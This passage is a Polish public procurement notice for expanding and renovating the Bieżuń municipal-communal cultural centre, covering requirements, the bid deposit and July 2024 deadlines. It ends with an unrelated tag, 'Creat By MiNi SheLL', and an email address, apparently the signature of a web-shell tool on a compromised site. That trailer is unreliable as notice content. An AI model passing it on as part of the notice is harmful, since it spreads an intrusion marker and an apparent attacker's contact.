wszystkich robót i kosztów niezbędnych do wykonania przedmiotu umowy, sporządzonych metodą uproszczoną wskazującego sposób wyliczenia ceny ofertowej: z podziałem na branże i zakres rzeczowy zamówienia z wyszczególnieniem zastosowanych w kosztorysach ofertowych składników cenotwórczych<br/>3.5 Wykonawca zobowiązany jest do zapewnienia na własny koszt bezpiecznych warunków ruchu drogowego i pieszego w rejonie prowadzonych robót objętych umową i wykonać na własny koszt czasową organizację ruchu „na czas budowy” dla drogi wojewódzkiej nr 541 i drogi gminnej nr 460146W ul. Nadwkrzańska, którą należy uzgodnić z Starostwem Powiatowym w Żurominie oraz Marszałkiem Województwa Mazowieckiego – jako zarządcą drogi wojewódzkiej nr 541. <br/><br/> Ponadto koszt pełnej obsługi geodezyjnej związanej z realizacją zamówienia oraz wykonania inwentaryzacji geodezyjnej powykonawczej - po stronie wykonawcy.<br/>Pozostałe informacje zawiera SWZ oraz załączniki </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45210000-2 - Roboty budowlane w zakresie budynków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45212300-9 - Roboty budowlane w zakresie budowy artystycznych i kulturalnych obiektów budowlanych</p> <p class="mb-0">45261000-4 - Wykonywanie pokryć i konstrukcji dachowych oraz podobne roboty</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45111291-4 - Roboty w zakresie zagospodarowania terenu</p> <p class="mb-0">39113100-8 - Fotele</p> <p class="mb-0">42416100-6 - Windy</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45331000-6 - Instalowanie urządzeń grzewczych, wentylacyjnych i klimatyzacyjnych</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z pkt 21 SWZ opis kryteriów oceny ofert wraz z podaniem wag tych kryteriów i sposobu oceny ofert</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji na roboty budowlane</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu, o których mowa w art. 112 ust. 2 ustawy Pzp dotyczące:<br/><br/>1)	Zdolności do występowania w obrocie gospodarczym;<br/>Zamawiający nie określa warunku w tym zakresie<br/>2)	Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów; <br/>Zamawiający nie określa warunku w tym zakresie<br/>3)	Sytuacji ekonomicznej lub finansowej;<br/>Wykonawca spełni warunek udziału w postępowaniu, jeżeli wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia oraz, że posiada opłaconą polisę na sumę gwarancyjną ubezpieczenia nie mniejszą niż 8 000 000,00 zł.<br/>Suma gwarancyjna (lub podlimit na jedno zdarzenie) nie może być niższa niż 8.000.000 zł. Zamawiający nie wymaga odrębnej polisy obejmującej wyłącznie wykonanie przedmiotu zamówienia.<br/>Udział własny w szkodzie, franszyza redukcyjna lub integralna nie może być wyższa niż:<br/>- jeśli będzie określona kwotowo – 10.000 zł,<br/>- jeśli będzie określona procentowo – 10 % należnego odszkodowania.<br/>Okres ubezpieczenia winien obejmować cały okres (co najmniej od dnia złożenia oferty) w którym wykonawca będzie wykonywał umowę. W przypadku gdy polisa przedstawiona przez wykonawcę obejmuje część tego okresu wykonawca winien nie później niż na 14 dni przed końcem dotychczasowego okresu ubezpieczenia zawrzeć i dostarczyć zamawiającemu kopię polisy na kolejny okres ubezpieczenia.<br/>Zakres ochrony winien obejmować odpowiedzialność za wypadki ubezpieczeniowe powstałe w okresie ubezpieczenie bez względu na termin zgłoszenia roszczeń o ile roszczenie zostanie wniesione przed terminem przedawnienia roszczeń wynikającym z powszechnie obowiązujących przepisów prawa.<br/>Jeżeli wykonawca w trakcie realizacji zamówienia będzie korzystał z podwykonawcy ubezpieczenie winno obejmować również szkody wyrządzone przez podwykonawcę.<br/>Zakres ubezpieczenia winien obejmować szkody wyrządzone przez podwykonawców, jeśli wykonawca przy wykonaniu zamówienia będzie korzystał z podwykonawców. Suma gwarancyjna lub podlimit na jedno zdarzenie 5.000.000 zł.<br/><br/>W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek mogą spełniać łącznie.<br/><br/>4)	Zdolności technicznej lub zawodowej;<br/><br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że:<br/><br/>a)	w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie wykonał co najmniej dwie roboty budowlane polegające na rozbudowie i/lub przebudowie i/lub nadbudowie ogólnodostępnego obiektu kulturalnego np. kina, sale koncertowe, opery, teatry, sale kongresowe, domy kultury, teatry muzyczne o kubaturze minimum 2 400,00 m3 każda <br/>W przypadku gdy ww. zakres robót budowlanych będzie stanowił część robót o szerszym zakresie wykonawca zobowiązany jest wyodrębnić rodzajowo roboty budowlane niezbędne do wykazania spełniania w/w warunku.<br/><br/>W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia co najmniej jeden z wykonawców ubiegających się o udzielenie zamówienia musi spełnić warunek – wykazać się całym wymaganym doświadczeniem <br/><br/><br/> b) Zamawiający wymaga, aby Wykonawca wykazał, że dysponuje takim potencjałem, jak:<br/><br/>1)	1 osoba, która będzie pełniła funkcję KIEROWNIKA BUDOWY posiadająca uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno – budowlanej – BEZ OGRANICZEŃ* <br/><br/>2)	1 osoba która będzie pełnić funkcję KIEROWNIKA ROBÓT BRANŻY KONSTRUKCYJNO – BUDOWLANEJ posiadająca uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno – budowlanej*<br/><br/>3)	1 osoba, która będzie pełniła funkcję KIEROWNIKA ROBÓT BRANŻY SANITARNEJ posiadająca uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń, wodociągowych i kanalizacyjnych, instalacji i urządzeń cieplnych, wentylacyjnych i gazowych*<br/><br/>4)	1 osoba, która będzie pełniła funkcję KIEROWNIKA ROBÓT BRANŻY ELEKTRYCZNEJ posiadająca uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i energetycznych*<br/><br/>5)	1 osoba, która będzie pełniła funkcję KIEROWNIKA ROBÓT teletechnicznych (AV- audio video i IT – teletechnicznej) posiadająca uprawnienia w specjalnościach instalacyjnych w telekomunikacji przewodowej wraz z infrastrukturą towarzyszącą*<br/><br/><br/>W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek mogą spełniać łącznie.<br/><br/>Zamawiający dopuszcza możliwość wskazania tej samej osoby do kierowania robotami w wielu branżach pod warunkiem posiadania stosownych uprawnień. <br/><br/>*) wydane na podstawie obecnie obowiązujących przepisów prawa lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów prawa lub kwalifikacje równoważne do w/w, zdobyte w innych państwach na zasadach określonych w art. 12a Ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2024 r. poz. 725 z późn. zm.) oraz zagraniczne uprawnienia uznane w zakresie i na zasadach opisanych w ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (t.j. Dz. U. z 2023 r. poz. 334). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076) z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej (Załącznik nr 9 do SWZ)<br/>2)	Odpis lub informacja z krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji ( w przypadku nie wskazania w ofercie);</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	Dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia wraz z dowodem opłaty; <br/>2)	Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie (Załącznik nr 4 do SWZ).<br/>Dowodami o których mowa są referencje, bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty<br/>3)	Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (Załącznik nr 5 do SWZ).</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1)	Pełnomocnictwo osoby lub osób podpisujących ofertę – jeżeli uprawnienie do podpisu nie wynika z wpisu do CEiDG lub KRS <br/>Dokument pełnomocnictwa obejmujący swym zakresem umocowanie do reprezentowania w postepowaniu w tym do złożenia oferty lub złożenia oferty i podpisania umowy należy dołączyć do oferty. Pełnomocnictwo powinno zawierać w szczególności wskazanie:<br/>- postępowania o zamówienie publiczne, którego dotyczy,<br/>- wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby,<br/>- ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/>2)	W przypadku złożenia oferty wspólnej – pełnomocnictwo udzielone liderowi<br/>3)	Zobowiązanie podmiotu udostępniającego zasoby – załącznik nr 8 do SWZ lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizuje zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów na podstawie art. 118 ust. 3 Pzp – jeżeli dotyczy <br/>4)	Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia ( z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy) – na podstawie art. 117 ust. 4 Pzp – załącznik nr 7 do SWZ – jeżeli dotyczy<br/>5)	Zastrzeżenie tajemnicy przedsiębiorstwa (jeżeli dotyczy) <br/>6) dowód potwierdzający wniesienie wadium, Zamawiający zaleca załączenie do oferty dokumentu potwierdzającego wniesienie wadium w pieniądzu na rachunek bankowy Zamawiającego. W przypadku wniesienia wadium w postaci niepieniężnej, do oferty należy dołączyć dokument potwierdzający wniesienie wadium. Wadium należy przekazać w takiej formie w jakiej został on ustanowiony przez gwaranta, tj. oryginał dokumentu w postaci elektronicznej podpisany kwalifikowanym podpisem elektronicznym przez jego wystawcę. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości 50 000 zł (słownie: pięćdziesiąt tysięcy złotych 00/100).<br/> Wadium wnosi się przed upływem terminu składania ofert i utrzymuje się nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp. <br/>Wykonawca może wnieść wadium w jednej lub kilku następujących formach przewidzianych w art. 97 ust. 7 ustawy Pzp tj:<br/>1) pieniądzu, <br/>2) gwarancjach bankowych<br/>3) gwarancjach ubezpieczeniowych <br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020, poz. 299 ze zm.).<br/> Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone jako oryginał gwarancji lub poręczenia w postaci elektronicznej.<br/>Wadium wnoszone w formie gwarancji lub poręczeń musi zawierać zobowiązanie gwaranta do zapłacenia kwoty gwarancji/poręczenia bezwarunkowo i na pierwsze pisemne żądanie Zamawiającego, w sytuacjach określonych w art. 98 ust. 6 ustawy Pzp <br/> Wadium w pieniądzu należy wnieść przelewem na konto Zamawiającego:<br/> Bank Spółdzielczy w Raciążu – Nr NRB: 60 8212 0009 0000 3678 2008 0006 z dopiskiem – wadium Rozbudowa wraz z nadbudową i przebudową budynku Miejsko – Gminnego Ośrodka Kultury w Bieżuniu.<br/>Oferta jest skutecznie zabezpieczona wadium, jeżeli pieniądz znajduje się na koncie Zamawiającego w terminie (godzina) składania ofert.<br/> W przypadku gdy Wykonawca nie wniósł wadium lub wniósł w sposób nieprawidłowy lub nie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium, w przypadku o którym mowa w art. 98 ust.2 pkt 3 ustawy Pzp Zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 14 ustawy Pzp.<br/>Szczegóły do.t wadium w pkt. 15 SWZ <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> - Wykonawcy występujący wspólnie o udzielenie zamówienia są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>	- Wszelka korespondencja będzie prowadzona przez zamawiającego wyłącznie z pełnomocnikiem.<br/>	- Przepisy dotyczące Wykonawców stosuje się odpowiednio do Wykonawców ubiegających się wspólnie o udzielenie zamówienia.<br/>- Jeżeli oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zostanie wybrana Zamawiający może przed zawarciem umowy w sprawie zamówienia publicznego wezwać do przedstawienia umowy regulującej współpracę tych Wykonawców.<br/>- W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawców wspólnie ubiegających się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane, do realizacji których te zdolności są wymagane. W takim przypadku wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio do oferty oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni wykonawcy. <br/>- Oświadczenie, o spełnieniu warunków udziału w postępowaniu składa każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego w zakresie, w jakim każdy z wykonawców wykazuje spełnienie warunków udziału w postępowaniu lub pełnomocnik w imieniu każdego z wykonawców odrębnie.<br/>-	Oświadczenie o braku podstaw wykluczenia składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego lub pełnomocnik w imieniu każdego z wykonawców odrębnie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający na podstawie art. 455 ustawy Pzp przewiduje możliwość dokonania zmian postanowień zawartej umowy w sprawie zamówienia publicznego w sposób i na warunkach określonych w projekcie umowy stanowiącej załącznik nr 6 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-23 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/umig_biezun</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-23 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-08-21</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Inwestycja dofinansowania z Programu Inwestycji Strategicznych - Polski Ład Edycja8

Creat By MiNi SheLL
Email: jattceo@gmail.com